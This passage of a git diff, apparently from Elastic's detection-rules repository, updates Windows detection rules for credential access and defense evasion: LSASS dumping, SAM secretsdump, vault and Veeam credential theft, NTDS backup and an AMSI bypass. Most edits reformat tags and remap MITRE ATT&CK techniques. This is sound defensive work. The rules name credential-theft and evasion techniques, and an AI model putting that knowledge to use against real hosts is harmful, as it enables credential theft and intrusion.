Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,13 +100,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" +id = "T1212" +name = "Exploitation for Credential Access" +reference = "https://attack.mitre.org/techniques/T1212/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/credential_access_remote_sam_secretsdump.toml b/rules/windows/credential_access_remote_sam_secretsdump.toml index 96822ab9c0a..f3fde2b0828 100644 --- a/rules/windows/credential_access_remote_sam_secretsdump.toml +++ b/rules/windows/credential_access_remote_sam_secretsdump.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -67,7 +67,15 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -81,18 +89,31 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/credential_access_saved_creds_vault_winlog.toml b/rules/windows/credential_access_saved_creds_vault_winlog.toml index 6435dd1f66a..2b62541ede2 100644 --- a/rules/windows/credential_access_saved_creds_vault_winlog.toml +++ b/rules/windows/credential_access_saved_creds_vault_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -87,18 +87,24 @@ sequence by winlog.computer_name, winlog.process.pid with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.004" name = "Windows Credential Manager" reference = "https://attack.mitre.org/techniques/T1555/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_saved_creds_vaultcmd.toml b/rules/windows/credential_access_saved_creds_vaultcmd.toml index 7e05143b527..bcb205d1e7a 100644 --- a/rules/windows/credential_access_saved_creds_vaultcmd.toml +++ b/rules/windows/credential_access_saved_creds_vaultcmd.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -94,18 +94,24 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.004" name = "Windows Credential Manager" reference = "https://attack.mitre.org/techniques/T1555/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml index 93a9e7334eb..6746281b95d 100644 --- a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml +++ b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -75,7 +75,17 @@ Audit Authorization Policy Change (Success,Failure) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "query" @@ -86,26 +96,26 @@ event.code:4704 and host.os.type:"windows" and winlog.event_data.PrivilegeList:" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml index 8d7dfb8c6b0..f2acb0609bf 100644 --- a/rules/windows/credential_access_shadow_credentials.toml +++ b/rules/windows/credential_access_shadow_credentials.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -85,7 +85,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "query" @@ -98,26 +107,14 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml index 756dc3f5d77..f7b5e02f1bd 100644 --- a/rules/windows/credential_access_spn_attribute_modified.toml +++ b/rules/windows/credential_access_spn_attribute_modified.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/22" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -84,7 +84,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "query" @@ -97,13 +106,19 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.OperationType:" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" +[[rule.threat.technique.subtechnique]] +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml index 94f860c2038..53f21c1ebca 100644 --- a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml +++ b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/07" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -96,18 +96,31 @@ process where host.os.type == "windows" and event.code == "10" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml index 5fe01b915f7..e63eabdab29 100644 --- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml +++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -82,7 +82,17 @@ Special Logon (Success) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", +] type = "eql" query = ''' @@ -98,18 +108,36 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan= [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" +[[rule.threat.technique.subtechnique]] +id = "T1003.004" +name = "LSA Secrets" +reference = "https://attack.mitre.org/techniques/T1003/004/" + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml index 0e658d8cb0b..a019bfa0a69 100644 --- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml +++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic", "Austin Songer"] @@ -93,7 +93,20 @@ This event will only trigger if symbolic links are created from a new process sp Direct access to a shell and calling symbolic link creation tools will not generate an event matching this rule. """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -111,26 +124,24 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.002" +name = "Security Account Manager" +reference = "https://attack.mitre.org/techniques/T1003/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.003" +name = "NTDS" +reference = "https://attack.mitre.org/techniques/T1003/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_veeam_backup_dll_imageload.toml b/rules/windows/credential_access_veeam_backup_dll_imageload.toml index a78053119d7..0af9521613a 100644 --- a/rules/windows/credential_access_veeam_backup_dll_imageload.toml +++ b/rules/windows/credential_access_veeam_backup_dll_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -77,13 +77,36 @@ Veeam Backup software is crucial for data protection, enabling secure backup and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/credential_access_veeam_commands.toml b/rules/windows/credential_access_veeam_commands.toml index b6b0c4da319..26d95dd353c 100644 --- a/rules/windows/credential_access_veeam_commands.toml +++ b/rules/windows/credential_access_veeam_commands.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,21 @@ references = ["https://thedfirreport.com/2021/12/13/diavol-ransomware/"] risk_score = 47 rule_id = "b661f86d-1c23-4ce7-a59e-2edbdba28247" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -80,13 +94,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/credential_access_wbadmin_ntds.toml b/rules/windows/credential_access_wbadmin_ntds.toml index 159f6ad96c9..d8e4b5920ef 100644 --- a/rules/windows/credential_access_wbadmin_ntds.toml +++ b/rules/windows/credential_access_wbadmin_ntds.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/05" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -89,18 +89,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.002" +name = "Security Account Manager" +reference = "https://attack.mitre.org/techniques/T1003/002/" [[rule.threat.technique.subtechnique]] id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml index f4cc7db11aa..e8bd3d77a6c 100644 --- a/rules/windows/credential_access_web_config_file_access.toml +++ b/rules/windows/credential_access_web_config_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/19" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ references = [ risk_score = 73 rule_id = "5841b80f-a1f8-4c00-a966-d2cc4a7a82e4" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "new_terms" @@ -72,34 +79,18 @@ event.category:file and host.os.type:windows and event.action:open and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable", "user.id"] diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml index 92be7b8f51b..fb71341678b 100644 --- a/rules/windows/credential_access_wireless_creds_dumping.toml +++ b/rules/windows/credential_access_wireless_creds_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "system", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -96,7 +96,21 @@ references = [ risk_score = 73 rule_id = "2de87d72-ee0c-43e2-b975-5f0b029ac600" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -109,13 +123,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml index c6f704addd6..ab0b32e27a3 100644 --- a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml +++ b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [transform] [[transform.osquery]] @@ -104,7 +104,21 @@ This rule looks for the execution of the `attrib.exe` utility with a command lin risk_score = 21 rule_id = "4630d948-40d4-4cef-ac69-4002e29bc3db" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -126,18 +140,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" +[[rule.threat.technique.subtechnique]] +id = "T1222.001" +name = "Windows File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/001/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml index e158e20003b..f239ebb7b8f 100644 --- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml +++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -132,21 +132,39 @@ event.category:"process" and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" 